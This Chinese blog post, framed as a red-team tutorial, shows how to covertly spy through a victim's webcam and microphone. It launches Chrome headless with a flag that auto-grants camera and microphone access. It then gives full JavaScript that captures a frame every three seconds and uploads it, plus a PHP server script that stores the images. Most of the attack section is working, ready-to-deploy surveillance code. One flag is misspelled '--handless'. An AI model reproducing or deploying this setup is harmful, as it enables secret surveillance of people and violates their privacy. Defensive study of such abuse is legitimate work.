百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术资源 > 正文

红队场景下的浏览器滥用:静默接管摄像头与麦克风

moboyou 2025-08-23 07:06 8 浏览

红队场景下的浏览器滥用:静默接管摄像头与麦克风

前言:

在某些红队行动演练中,攻击者并不会直接丢入可疑的恶意程序,而是巧妙地 以合法之名行恶意之实 ,利用系统自带或被信任的合法程序(白文件)执行恶意操作。这种手法被称为 LOLBins 攻击 (Living Off the Land Binaries)。由于这些程序本身已被系统签名并列入安全白名单,安全软件往往对其放行,攻击者便可在不触发告警的情况下,实现文件下载、命令执行、数据窃取,甚至是摄像头与麦克风的静默监听,从而在受害者毫无察觉的情况下达成渗透与监控的目的。

例如Windows的certutil.exe工具,本是用于管理证书的工具,但攻击者可以利用它从远程服务器下载并解码恶意文件(但这种方式早已被各大杀软、EDR标记)。在安全软件眼中,这一切都是“正常的系统行为”。由于这些程序本身已被系统签名并列入安全白名单,防护机制往往会放行,攻击者便可在不触发告警的情况下,实现文件下载、命令执行、数据窃取,甚至是摄像头与麦克风的静默监听,从而在受害者毫无察觉的情况下达成渗透与监控的目的。

今天,我将向大家展示一种技术方法,能够在静默状态下监控本地摄像头和麦克风。本文参考了这篇文章
https://mrd0x.com/spying-with-chromium-browsers-camera/,作者的思路非常巧妙。

通过学习这类新型攻击方法,可以更清楚地了解潜在的安全风险,从而在网络的“黑暗森林”中预防那些无形的威胁。

正文:

现代浏览器可以通过Javascript访问本地摄像头、麦克风,网页就能获取到用户的摄像头视频流并显示在页面上。不过,这并不是随便就能用的,浏览器会先弹出权限请求,让用户选择是否允许访问,这是为了保护隐私和安全。通过以下这段代码进行实现,通过浏览器访问本地摄像头。

html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>浏览器访问本地摄像头示例title>
head>
<body>
<h2>预览摄像头h2>
<video id="video" width="640" height="480" autoplay>video>

<script>
// 获取 video 元素
const video = document.getElementById('video');

// 请求访问摄像头
navigator.mediaDevices.getUserMedia({ video: true, audio: false })
.then(stream => {
// 将摄像头流绑定到 video 元素
video.srcObject = stream;
})
.catch(err => {
console.error("无法访问摄像头: ", err);
alert("无法访问摄像头,请检查权限或设备!");
});
script>
body>
html>

直接打开该文件后Chrome会弹出提示询问用户是否允许此文件访问摄像头,如果用户点击不允许,则无法将摄像头的事实内容呈现在页面中。

点击允许后才能获取到实时的摄像头画面呈现到HTML页面中。

静默方式打开摄像头、麦克风

在mrd0x的这篇文章中介绍了一种方法,利用Chrome命令行参数在静默无需手动点击等交互的场景下打开摄像头、麦克风(这个过程也不会打开浏览器窗口)。主要利用两个命令行参数来实现,分别是 --headless、
--auto-accept-camera-and-microphone-capture。

Chrome 启动参数(Command-line Flags) 是在启动 Chrome 或 Chromium 浏览器时,附加在命令行里的特殊指令,用来 改变浏览器的默认行为。

这个网页下有Chrome各个启动参数的详细介绍

https://peter.sh/experiments/chromium-command-line-switches/


关键启动命令:

  • --headless

--headless 是 Chrome / Chromium 的一个启动参数,用来 让浏览器在“无界面模式”下运行 ,也就是没有图形界面,不会弹出浏览器窗口。学过python的朋友应该知道Chromium爬虫,就是无界面浏览器,常用于页面需要js渲染、加解密绕过的场景。

  • --auto-accept-camera-and-microphone-capture


--auto-accept-camera-and-microphone-capture
Chrome / Chromium 的一个启动参数 ,作用是 自动允许网页访问摄像头和麦克风 ,无需用户手动点击“允许”。

静默启动浏览器并自动允许打开麦克风或摄像头 .\chrome.exe --headless
--auto-accept-camera-and-microphone-capture http://example.com

  1. 启动浏览器(当前目录下的 chrome.exe)。
  2. 无界面模式 下运行。
  3. 静默自动授权 网页访问摄像头和麦克风,然后访问指定网址。

编辑一个网页JS获取摄像头视频流,每隔3s截取一次画面上传到服务器。 html >
< html >
< head >
head >
< body >
< video id = "video" autoplay playsinline > video >
< canvas id = "canvas" width = "1000" height = "1000" style = "display:none;" > canvas >
< script >
// 获取视频元素和画布元素
const video = document .getElementById( 'video' );
const canvas = document .getElementById( 'canvas' );
// 获取画布 2D 绘图上下文,用于绘制图像
const context = canvas.getContext( '2d' );

/**
* 开始摄像头捕获
* 调用浏览器的 MediaDevices API 获取视频流
*/

function startCapture ( ) {

navigator.mediaDevices.getUserMedia({
video : true }).then( stream => {
// 将获取到的视频流绑定到 video 元素上进行播放
video.srcObject = stream;

// 每隔 3 秒截取一次画面并上传
setInterval( () => takeAndUploadSnapshot(), 3000 );
});
}

/**
* 截图并上传到服务器
*/

function takeAndUploadSnapshot ( ) {
// 将当前视频帧绘制到 canvas 上
context.drawImage(video, 0 , 0 , canvas.width, canvas.height);

// 生成唯一的文件名(时间戳防重复)
const timestamp = Date .now();
const filename = `imgCapture- ${timestamp} .png` ;

// 将 canvas 内容转换成 Base64 编码的 PNG 图片
const dataUrl = canvas.toDataURL( 'image/png' );

// 发送 POST 请求,将图片数据和文件名上传到服务器
fetch( 'upload.php' , {
method : 'POST' ,
headers : { 'Content-Type' : 'application/json' },
body : JSON .stringify({
image : dataUrl, // Base64 图片数据
filename : filename // 图片文件名
})
});
}

// 页面加载时启动摄像头捕获
startCapture();
script >
body >
html >

服务端接收截图
$data = json_decode(file_get_contents( "php://input" ), true );

// 基础字段检查
if (!$data || ! isset ($data[ 'image' ]) || ! isset ($data[ 'filename' ])) {
http_response_code( 400 );
exit ( 'Invalid request data' );
}

$imageBase64 = $data[ 'image' ];
$filename = $data[ 'filename' ];

// 检查文件扩展名是否为 .png(不区分大小写)
if (strtolower(pathinfo($filename, PATHINFO_EXTENSION)) !== 'png' ) {
http_response_code( 400 );
exit ( 'Only .png files are allowed' );
}

// 检查 Base64 数据头是否是 PNG
if (strpos($imageBase64, 'data:image/png;base64,' ) !== 0 ) {
http_response_code( 400 );
exit ( 'Invalid image format' );
}

// 移除 Base64 头并解码
$base64String = preg_replace( '#^data:image/png;base64,#i' , '' , $imageBase64);
$imageData = base64_decode($base64String, true );

// 检查 Base64 解码是否成功
if ($imageData === false ) {
http_response_code( 400 );
exit ( 'Base64 decode failed' );
}

// 目录设置(确保存在且可写)
$uploadDir = '/var/www/imgCapture' ;
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755 , true );
}

// 使用安全文件名(防止目录穿越)
$safeFilename = preg_replace( '/[^a-zA-Z0-9_\-\.]/' , '_' , $filename);
$filePath = $uploadDir . '/' . $safeFilename;

// 写入文件
if (file_put_contents($filePath, $imageData)) {
echo json_encode([ 'success' => true ]);
} else {
http_response_code( 500 );
echo json_encode([ 'success' => false ]);
}
?>

--handless
--auto-accept-camera-and-microphone-capture 启动Chrome,无窗口、自动允许打开麦克风、摄像头。

服务器这边成功接收截图,打个码。

部署html、php的服务器必须是https的,http会导致触发安全策略。

参考
:https://mrd0x.com/spying-with-chromium-browsers-camera/


相关推荐

Excel技巧:SHEETSNA函数一键提取所有工作表名称批量生产目录

首先介绍一下此函数:SHEETSNAME函数用于获取工作表的名称,有三个可选参数。语法:=SHEETSNAME([参照区域],[结果方向],[工作表范围])(参照区域,可选。给出参照,只返回参照单元格...

Excel HOUR函数:“小时”提取器_excel+hour函数提取器怎么用

一、函数概述HOUR函数是Excel中用于提取时间值小时部分的日期时间函数,返回0(12:00AM)到23(11:00PM)之间的整数。该函数在时间数据分析、考勤统计、日程安排等场景中应用广泛。语...

Filter+Search信息管理不再难|多条件|模糊查找|Excel函数应用

原创版权所有介绍一个信息管理系统,要求可以实现:多条件、模糊查找,手动输入的内容能去空格。先看效果,如下图动画演示这样的一个效果要怎样实现呢?本文所用函数有Filter和Search。先用filter...

FILTER函数介绍及经典用法12:FILTER+切片器的应用

EXCEL函数技巧:FILTER经典用法12。FILTER+切片器制作筛选按钮。FILTER的函数的经典用法12是用FILTER的函数和切片器制作一个筛选按钮。像左边的原始数据,右边想要制作一...

office办公应用网站推荐_office办公软件大全

以下是针对Office办公应用(Word/Excel/PPT等)的免费学习网站推荐,涵盖官方教程、综合平台及垂直领域资源,适合不同学习需求:一、官方权威资源1.微软Office官方培训...

WPS/Excel职场办公最常用的60个函数大全(含卡片),效率翻倍!

办公最常用的60个函数大全:从入门到精通,效率翻倍!在职场中,WPS/Excel几乎是每个人都离不开的工具,而函数则是其灵魂。掌握常用的函数,不仅能大幅提升工作效率,还能让你在数据处理、报表分析、自动...

收藏|查找神器Xlookup全集|一篇就够|Excel函数|图解教程

原创版权所有全程图解,方便阅读,内容比较多,请先收藏!Xlookup是Vlookup的升级函数,解决了Vlookup的所有缺点,可以完全取代Vlookup,学完本文后你将可以应对所有的查找难题,内容...

批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数

批量查询快递总耗时?用Excel这个公式,自动计算揽收到签收天数在电商运营、物流对账等工作中,经常需要统计快递“揽收到签收”的耗时——比如判断某快递公司是否符合“3天内送达”的服务承...

Excel函数公式教程(490个实例详解)

Excel函数公式教程(490个实例详解)管理层的财务人员为什么那么厉害?就是因为他们精通excel技能!财务人员在日常工作中,经常会用到Excel财务函数公式,比如财务报表分析、工资核算、库存管理等...

Excel(WPS表格)Tocol函数应用技巧案例解读,建议收藏备用!

工作中,经常需要从多个单元格区域中提取唯一值,如体育赛事报名信息中提取唯一的参赛者信息等,此时如果复制粘贴然后去重,效率就会很低。如果能合理利用Tocol函数,将会极大地提高工作效率。一、功能及语法结...

Excel中的SCAN函数公式,把计算过程理清,你就会了

Excel新版本里面,除了出现非常好用的xlookup,Filter公式之外,还更新一批自定义函数,可以像写代码一样写公式其中SCAN函数公式,也非常强大,它是一个循环函数,今天来了解这个函数公式的计...

Excel(WPS表格)中多列去重就用Tocol+Unique组合函数,简单高效

在数据的分析和处理中,“去重”一直是绕不开的话题,如果单列去重,可以使用Unique函数完成,如果多列去重,如下图:从数据信息中可以看到,每位参赛者参加了多项运动,如果想知道去重后的参赛者有多少人,该...

Excel(WPS表格)函数Groupby,聚合统计,快速提高效率!

在前期的内容中,我们讲了很多的统计函数,如Sum系列、Average系列、Count系列、Rank系列等等……但如果用一个函数实现类似数据透视表的功能,就必须用Groupby函数,按指定字段进行聚合汇...

Excel新版本,IFS函数公式,太强大了!

我们举一个工作实例,现在需要计算业务员的奖励数据,右边是公司的奖励标准:在新版本的函数公式出来之前,我们需要使用IF函数公式来解决1、IF函数公式IF函数公式由三个参数组成,IF(判断条件,对的时候返...

Excel不用函数公式数据透视表,1秒完成多列项目汇总统计

如何将这里的多组数据进行汇总统计?每组数据当中一列是不同菜品,另一列就是该菜品的销售数量。如何进行汇总统计得到所有的菜品销售数量的求和、技术、平均、最大、最小值等数据?不用函数公式和数据透视表,一秒就...